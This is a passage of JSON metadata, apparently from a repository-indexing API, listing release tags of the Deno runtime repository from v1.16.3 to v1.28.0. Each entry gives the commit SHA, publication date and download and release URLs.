bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno